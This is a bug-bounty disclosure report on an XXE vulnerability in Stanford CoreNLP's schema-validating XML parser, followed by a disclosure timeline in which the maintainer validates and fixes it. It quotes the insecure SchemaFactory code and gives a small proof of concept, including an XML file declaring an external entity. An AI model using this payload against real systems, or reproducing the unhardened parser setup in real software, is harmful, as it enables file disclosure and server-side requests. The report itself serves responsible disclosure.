Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp

Valid

Reported on

Jan 15th 2022


Description

When a malicious schema XML file is passed to getValidatingXmlParser(), the parser is vulnerable to XXE when the SchemaFactory parses the schema XML file.

In https://github.com/stanfordnlp/CoreNLP/blob/4c28eb5f5e44381b4157aa4fcab72e9231ce42b8/src/edu/stanford/nlp/util/XMLUtils.java#L304L305

public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
...
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(schemaFile);

SchemaFactory is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE when it creates a new schema from a schemaFile.

Proof of Concept

By default, SchemaFactory is vulnerable to XXE as shown by the example below:

import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;

import java.io.File;

public class Poc {

    public static void main(String[] args) {        
        try {
            SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            Schema schema = factory.newSchema(new File("poc.xml"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

poc.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>

Patch

https://github.com/stanfordnlp/corenlp/compare/HEAD...haxatron:fix-xxe-2

Impact

This vulnerability is capable of XXE when a developer uses this function to validate XML files against malicious schema files

We are processing your report and will contact the stanfordnlp/corenlp team within 24 hours. 4 months ago
haxatron submitted a
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back 4 months ago
stanfordnlp/corenlp maintainer validated this vulnerability 4 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
stanfordnlp/corenlp maintainer confirmed that a fix has been merged on 1940ff 4 months ago
haxatron has been awarded the fix bounty
stanfordnlp/corenlp maintainer
4 months ago

Maintainer


Thanks!

to join this conversation